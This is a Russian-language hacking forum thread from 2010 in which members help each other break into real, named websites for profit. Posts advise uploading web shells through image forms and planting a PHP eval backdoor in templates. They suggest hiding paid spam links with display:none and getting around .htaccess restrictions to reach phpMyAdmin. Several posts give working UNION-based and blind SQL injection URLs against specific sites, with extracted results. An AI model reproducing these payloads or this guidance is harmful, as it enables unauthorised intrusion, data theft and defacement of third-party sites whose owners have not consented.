Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Сказал бы,что за кмс,если это не самопис то из админки известны способы заливки.
    Если самопис какой-то,1.)ищи заливку картинок и пробуй загрузить шелл , 2.)Ищи место куда можно вставить пхп код и чтоб он исполнялся,например если в шаблонах разрешен пхп,то вставляешь туда пхп код например eval(stripslashes($_GET[e])); вызываешь пхпинфо,а дальше уже смотришь по ситуации...
     
  2. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    TrinetCMS, тоесть пробывать заливать скрипты через всевозможные формы загрузки( фотографии, видео и т.д.). Так а не запилят банер? Есть смысл делать это через Sape, просто при анализе это сайта через http://www.cy-pr.com/, говорят что сапа отвалит больше 1000 $ , вот и решил попробовать.
    А какой шелл посоветуете, есть какие-нибудь факи по ним?
     
    #15482 MastaBass1, 29 Nov 2010
    Last edited: 29 Nov 2010
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    губозакататель еще дадут бесплатный никелированный, если сапа даст больше 1к $, значит сайт с высоким тиц-ем, скорее всего он в сапе уже есть, если нет то за ним следят и спалят появление всяких ссылок очень быстро..
     
  4. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Яша 450
    Google PageRank (PR) 5
    Его нет в сапе, а если умело, может и не запилят? :D
     
  5. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    если на сайте нет нормального админа, а только контент-менеджер который дальше админки ничего не знает то можно попробовать скрыть в шаблоне ссылки через display:none, но все же это палево все равно. вдруг завтра как раз решат поставить сапу на сайт а тут хоп - сайт уже в сапе ))
     
  6. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Ну посмотрим, а что такое display:none, типо реклама вида Hide, так сапа заблочит за это?!
     
  7. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Ладно, такой вопрос, если есть доступ через шел к папке phpmyadmin, а из адресной строки доступа нет(403 Forbidden), как открыть доступ к этой директории?
     
  8. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    в этой папке или в корне есть .htaccess? может через него доступ закрыт.
     
  9. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Понял, поищу, спасибо!
     
  10. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Делаю запрос
    Выходит такая ошибка:
    Warning: array_merge() [function.array-merge]: Argument #2 is not an array

    Если делаю так
    Отображается страница с записями

    если перед 2 минус ставлю
    getData: Incorrect table name '' SQL=SELECT DISTINCT `` AS blabla FROM `` LIMIT 0, 10

    Какой запрос сформировать?

    Интересно что даже если делаю 1,2,3,4 и т.д.
    данные отображаются

    //обсуждение таких вопросов без указания линков, не эффективно..иногда даже без результата {модер}
     
    #15490 noviyuser, 30 Nov 2010
    Last edited by a moderator: 30 Nov 2010
  11. Kiberpank

    Kiberpank New Member

    Joined:
    26 Nov 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Что за сайт-то?
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    у меня вопрос
    www.truvor.ru/news.php?%20id_new=-91+union+select%20+1,2,3,4,5,6,7,8,9
    как вывисти какиенибуть данные если всегда отображается только текст?
     
  13. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Смотри в title

    http://www.truvor.ru/news.php?id_new=-91+union+select+1,2,3,4,version(),6,7,8,9--
     
    #15493 TreV@N, 30 Nov 2010
    Last edited: 30 Nov 2010
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не получается вывести имя юзера.


    http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--

    http://www.oeaw.ac.at/oeaw_servlet/e_PersonenDetailsGeneric?id=12361+and+1=0+union+select+sys.login_user,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--
     
  15. apoclepsis

    apoclepsis New Member

    Joined:
    24 Jun 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    хи алл! народ помогите с Joomla 1.5.9 - сил ужо нет( ,какие у него дыры , хотяб статейку подкинте.
    спс)
     
  16. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Делаю запрос
    Все отлично показывает

    А на вот такой
    говорит
    Как я понял тут фильтруется from или набодобие того как это обойти?
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а погуглить влом?
     
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    попробуй указать базу где находится табличка users, если и так не сканает то скорее всего фильтр на from, попробуй подзапросами...
     
  19. noviyuser

    noviyuser Member

    Joined:
    18 Nov 2010
    Messages:
    645
    Likes Received:
    18
    Reputations:
    6
    Табличку указывал не проканало, а как подзапросы делать можно примерчик?
     
  20. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    можно попробовать вслепую:
    Code:
    http://www.oeaw.ac.at/oeaw_servlet/PersonenDetailsGeneric?id=12361+AND+ASCII(SUBSTR((SELECT+SYS.LOGIN_USER+FROM+DUAL),1,1))=87
    
    user:WWW
     
    1 person likes this.
Thread Status:
Not open for further replies.